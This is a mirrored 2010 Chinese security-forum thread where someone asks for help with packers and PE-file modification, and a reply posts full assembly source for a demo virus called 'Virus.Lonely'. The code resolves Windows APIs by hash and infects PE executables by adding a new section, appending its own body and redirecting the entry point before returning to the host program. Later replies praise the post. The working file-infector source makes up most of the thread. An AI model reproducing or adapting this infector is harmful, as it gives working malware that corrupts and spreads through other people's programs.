返回信息流哪位大牛有加壳的或者PE修改的经历留一下联系方式,有问题请教请教啊。
这是一条镜像帖。来源:北邮人论坛 / security / #27373同步于 2010/3/23
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
【找】哪位大牛有加壳的或者PE修改的经历留一下联系方式
lhy137910144
2010/3/23镜像同步4 回复
订阅后,新回复会通过你的通知中心匿名送达。
4 条回复
pe修改简单,无非添加节,插入代码等。要掌握的重点 对引入表 引出表 重定位 资源 结构的处理。
写壳也没什么难的,无非构建loader还原原有数据代码,但是要想做一个强大的保护壳或者是压缩壳需要的是成熟的思路和算法。如果仅仅需要个修改pe的代码,那么你就看下之前写的一段变形pe头添加节的病毒代码吧。
[code]
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;
; Virus.Lonely By: xfish
;
; (c)2009-05-20
; --- Lonely xfish. Email: AntiAntiWorm@Gmail.com
; --- thanks 29a, pediy, hacker.com.cn
;-----------------------------------------------------------------------------
format PE GUI 4.0
include 'win32ax.inc'
entry Virus_Entry
section '.Lonely' code readable writeable executable
Virus_Entry:
pushad
call Dels
int 3
int 3
int 3
Dels:
pop ebp
sub ebp, Dels-2*3
; kernel32
call GetKrnlBase
lea edi, [ebp+dwFunc]
push edi
push eax
call GetFuncAddress
@pushsz 'user32'
call [edi + _LoadLibray-dwFunc]
push edi
push eax
call GetFuncAddress
test ebp, ebp
jz .Inject
push 0
@pushsz 'Virus Demo'
@pushsz 'by:xfish http://www.pediy.com http://www.hacker.com.cn'
push 0
call [edi + _MessageBox-dwFunc]
push dword [ebp+JmpHost+1]
pop dword [esp+pushad_eax]
@pushsz 'test2.exe'
call Inject
popad
push eax
retn
.Inject:
@pushsz 'test.exe'
call Inject
popad
retn
;++
;
; int
; GetKrnlBase(
; void
; )
;
; Routine Description:
;
; 获得kernel32基地址
;
; Arguments:
;
; (esp) - return address
;
;
; Return Value:
;
; eax = krnlbase
;
;--
GetKrnlBase:
sub eax, eax
mov eax, [fs:eax+30h]
test eax, eax
js .Os9x
mov eax, [eax+0ch]
mov eax, [eax+1ch]
mov eax, [eax]
mov eax, [eax+8h]
jmp .Result
.Os9x:
mov eax, [eax+34h]
lea eax, [eax+7ch]
mov eax, [eax+3ch]
.Result:
retn
;++
;
; int
; GetFuncAddress
; int hModule,
; int pHashStringList
; )
;
; Routine Description:
;
; 获取Hash API地址
;
; Arguments:
;
; (esp) - return address
; (esp+4*8+4) - hModule
; (esp+4*8+8) - pHashStringList
;
; Return Value:
;
; nothing
;
;--
GetFuncAddress:
pushad
mov ebx, [esp+4*8+4]
mov edx, [ebx+3ch]
mov esi, [ebx++edx+78h]
lea esi, [esi+ebx+18h]
lodsd
xchg eax, ecx
lodsd
add eax, ebx
xchg eax, ebp
lodsd
add eax, ebx
xchg eax, edx
lodsd
add eax, ebx
push eax
mov esi, edx
.Next_Func:
lodsd
add eax, ebx
; Make Func Hash
xor edx, edx
.Make_Hash:
rol edx, 3
xor dl, byte [eax]
inc eax
cmp byte [eax], 0
jnz .Make_Hash
mov eax, [esp]
add dword [esp], 2
mov edi, [esp+4*8+8+4]
.Scan_Dw_Funcs:
cmp dword [edi], edx
jnz .Next_List
movzx eax, word [eax]
mov eax, [ebp+eax*4]
add eax, ebx
scasd
stosd
jmp .Ret
.Next_List:
scasd
scasd
cmp dword [edi], 0
jne .Scan_Dw_Funcs
.Ret:
loop .Next_Func
pop ecx
popad
retn 4*2
;++
;
; CF
; IsPe(
; pByte pMemory
; )
;
; Routine Description:
;
; 测试是否是PE文件
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - pMemory
;
; Return Value:
;
; eax -- NewSection Physical offset
; eax -- 0
;--
IsPe:
mov edx, [esp+4]
cmp word [edx], 'MZ'
jnz .RetFalse
add edx, [edx+3ch]
cmp word [edx], 'PE'
jnz .RetFalse
.RetTrue:
stc
retn 4*1
.RetFalse:
clc
retn 4*1
;++
;
; CF
; IsFileType(
; LPCTSTR lpFileName
; )
;
; Routine Description:
;
; 测试文件类型是否是32位二进制文件
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - lpFileName
;
; Return Value:
;
; CF -- 1, = TRUE.
;
;--
IsFileType:
push 0
push esp
push dword [esp+4*2+4]
call dword [ebp + _GetBinaryType]
pop eax
; 32BIT_BINARY = 0
test eax, eax
jne .RetFalse
.RetTrue:
stc
retn 4*1
.RetFalse:
clc
retn 4*1
;++
;
; void
; Inject(
; LPCTSTR lpFileName
; )
;
; Routine Description:
;
; 感染文件
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - lpFileName
;
; Return Value:
;
; nothing
;
;--
Inject:
pushad
mov esi, [esp+4*8+4*1]
;++
; Is File Pe Format
push esi
call IsFileType
jnc .Result
;--
sub eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
push esi
call [ebp + _CreateFile]
cmp eax, -1
jz .Result
xchg eax, ebx
push 0
push ebx
call [ebp + _GetFileSize]
push eax
;
push PAGE_READWRITE
push MEM_COMMIT
push eax
push 0
call [ebp + _VirtualAlloc]
;
pop edx
test eax, eax
jz .CloseHandle
xchg eax, edi
mov dword [ebp + .FreeSize], edx
push 0
push esp
push dword [ebp + .FreeSize]
push edi
push ebx
call [ebp + _ReadFile]
test eax, eax
jz .FreeMem
push edi
call IsPe
jnc .FreeMem
push Virus_Len
push edi
call AddSectionTable
test eax, eax
jz .FreeMem
;++ Update Oep, Write JmpHost
mov eax, edi
add eax, [eax+3ch]
mov ecx, edx
xchg ecx, [eax+28h]
add ecx, [eax+34h]
mov dword [ebp + JmpHost+1], ecx
;--
push FILE_BEGIN
push 0
push 0
push ebx
call [ebp+ _SetFilePointer]
push 0
push esp
lea eax, [ebp + .FreeSize]
push dword [eax]
push edi
push ebx
call [ebp + _WriteFile]
test eax, eax
jz .FreeMem
push FILE_END
push 0
push Virus_Len
push ebx
call [ebp + _SetFilePointer]
push ebx
call [ebp + _SetEndOfFile]
push FILE_CURRENT
push 0
push -(Virus_Len)
push ebx
call [ebp + _SetFilePointer]
push 0
push esp
push Virus_Len
lea eax, [ebp + Virus_Entry]
push eax
push ebx
call [ebp + _WriteFile]
test eax, eax
jz .FreeMem
.FreeMem:
push MEM_DECOMMIT
.FreeSize = $ + 1
push $
push edi
call [ebp + _VirtualFree]
.CloseHandle:
push ebx
call [ebp + _CloseHandle]
.Result:
popad
retn 4*1
;++
;
; int
; AddSectionTable(
; pByte pMemory
; DWORD dwLen
; )
;
; Routine Description:
;
; 添加节函数
;
; Arguments:
;
; (esp) - return address
;
; [esp+4*8+4*1] - pMemory
;
; [esp+4*8+4*2] - dwLen
;
; Return Value:
;
; eax = New Section PhysicalOffset, 0
; edx = New Section VirtualOffset
;
;--
AddSectionTable:
pushad
mov ebx, [esp+4*8+4*1]
mov esi, ebx
add esi, [esi+3ch]
;++
; edi = Section Table
movzx ecx, word [esi+IMAGE_FILE_HEADER.SizeOfOptionalHeader+4]
lea edi, dword [esi+ecx+4+sizeof.IMAGE_FILE_HEADER]
;--
;++
; Clear Bound Import Entry
lea edx, [esi+74h]
cmp dword [edx], 10h
jl .GoSectionTable
mov dword [edx+4+11*8], 0
;--
.GoSectionTable:
;++
; edx = First Section Offset
; edi = Last Section Table Offset
mov edx, [edi+IMAGE_SECTION_HEADER.PointerToRawData]
add edx, ebx
movzx ecx, word [esi+IMAGE_FILE_HEADER.NumberOfSections+4]
imul ecx, ecx, sizeof.IMAGE_SECTION_HEADER
add edi, ecx
;--
;++
; Expand PE Header Struct
; BaseOfData equ .lfanew
push edx
mov eax, edi
sub edx, eax
cmp edx, sizeof.IMAGE_SECTION_HEADER
pop edx
jge .AddSectionTable
; Test Expand Is Exist
cmp word [ebx+0ch], 'PE'
jnz .Expand
xor eax, eax
mov [esp+pushad_eax], eax
jmp .Result
.Expand:
sub eax, esi
xchg eax, ecx
pushad
lea edi, [ebx+0ch]
mov dword [esp+pushad_esi], edi
cld
rep movsb
mov dword [esp+pushad_edi], edi
sub edx, edi
xchg ecx, edx
xor eax, eax
rep stosb
popad
mov dword [ebx+3ch], 0ch
;--
.AddSectionTable:
; Inc Num
inc word [esi+06h]
; Sectio Name
mov dword [edi], '.xfi'
mov word [edi+4], 'sh'
; Physical size
push dword [esp+4*8+4*2]
pop dword [edi+10h]
; Physical offset
lea edx, [edi-28h]
mov eax, [edx+14h]
mov ecx, [edx+10h]
add eax, ecx
mov dword [edi+14h], eax
mov dword [esp+pushad_eax], eax
; Virtual size
push dword [esp+4*8+4*2]
pop dword [edi+8h]
; Virtual offset
push dword [esi+50h]
pop eax
mov dword [edi+0ch], eax
mov [esp+pushad_edx], eax
; Flags
mov dword [edi+24h], 0E0000020h
; SizeOfImage
mov ecx, [edi+08h]
add ecx, [edi+0ch]
mov dword [esi+50h], ecx
.Result:
popad
retn 4*2
;++
JmpHost:
push $
retn
;--
;++++++++++++++++++++++++++++++++++++++++++++++++++
dwFunc:
dd 0C0D6D616h
_CloseHandle dd 0
dd 038C62A7Ah
_CreateFile dd 0
dd 0ABD10842h
_GetBinaryType dd 0
dd 09554EFE7h
_GetFileSize dd 0
dd 00BE25545h
_ReadFile dd 0
dd 0A97175F9h
_SetEndOfFile dd 0
dd 0A9D1FD70h
_SetFilePointer dd 0
dd 0AB16D0AEh
_VirtualAlloc dd 0
dd 0B562D3DBh
_VirtualFree dd 0
dd 058D8C545h
_WriteFile dd 0
dd 0A412FD89h
_LoadLibray dd 0
dd 014D14C51h
_MessageBox dd 0
;-------------------------------------------------
Virus_Len = $ - Virus_Entry
[/code]
[/code]
为小鱼同学颁发奖状,以表彰小鱼为信息安全版增添的学术气氛。
欢迎小鱼同学常来信息安全版,分享自己的知识。
【 在 xfish (小鱼) 的大作中提到: 】
: pe修改简单,无非添加节,插入代码等。要掌握的重点 对引入表 引出表 重定位 资源
: 结构的处理。
: 写壳也没什么难的,无非构建loader还原原有数据代码,但是要想做一个强大的保护壳
: 或者是压缩壳需要的是成熟的思路和算法。如果仅仅需要个修改pe的代码,那么你就看下
: 之前写的一段变形pe头添加节的病毒代码吧。
: [code]
: ...................